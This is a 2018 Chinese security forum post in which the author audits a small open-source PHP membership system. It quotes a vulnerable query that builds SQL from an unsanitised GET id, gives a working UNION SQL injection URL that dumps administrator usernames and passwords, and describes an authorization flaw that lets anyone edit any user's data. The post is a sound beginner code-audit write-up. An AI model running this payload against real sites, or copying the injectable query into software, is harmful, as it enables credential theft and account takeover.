用户
搜索
  • TA的每日心情

    2017-12-28 15:34
  • 签到天数: 5 天

    连续签到: 1 天

    [LV.2]偶尔看看

    版主

    Rank: 7Rank: 7Rank: 7

    76

    主题

    263

    帖子

    1672

    魔法币
    收听
    0
    粉丝
    68
    注册时间
    2016-6-21

    i春秋认证春秋巡逻i春秋签约作者春秋游侠春秋文阁

    发表于 2018-12-3 14:56:11 35883

    这段时间在想着做个高校的会员管理系统,所以在chrome上装了个掘金插件,今天发现日推推了个类似的PHP写的小程序

    本着能省就省,有自行车还造什么轮子的原则
    于是乎

    git clone https://github.com/chaodada/member.git

    经过简单的部署后算是能打开了



    后台UI做的真心差评

    然后简单的看了下代码,发现几个SQL注入和一个越权

    SQL注入

    程序使用PDO连接数据库,后台使用了预编译SQL指令,没多大问题
    看看前台用户处
    xiu.php

    if (isset($_GET['id'])) {
        $sql = "select id,username,password,integral,**,email from u_users WHERE 1=1 and id={$_GET['id']} ";
        $res = $pdo->query($sql);
        list($id, $username, $password, $integral, $**, $email) = $res->fetch(PDO::FETCH_NUM);
    }

    很明显的GET型注入
    爆管理员密码的payload:

    http://localhost/member-master/member-master/user/xiu_user.php?id=-37 union select 1,2,group_concat(username,0x2a,password,0x20,mpw),4,5,6 from memsystem.u_admin %23

    越权

    同样还是刚才那个位置


    id修改后即可更改任意用户信息

    总结

    这套程序距离实用还有不小的距离 适合入门级选手审计练手
    程序下载地址:https://github.com/chaodada/member.git

    Debug The World
    应该是个人开发的小众cms,用户量很低的
    使用道具 举报 回复
    发表于 2018-12-3 16:08:30
    初来乍到01 发表于 2018-12-3 07:07
    应该是个人开发的小众cms,用户量很低的

    对的 4天前刚push到GitHub,,,今天碰到了就看了下
    Debug The World
    使用道具 举报 回复
    感谢分享
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册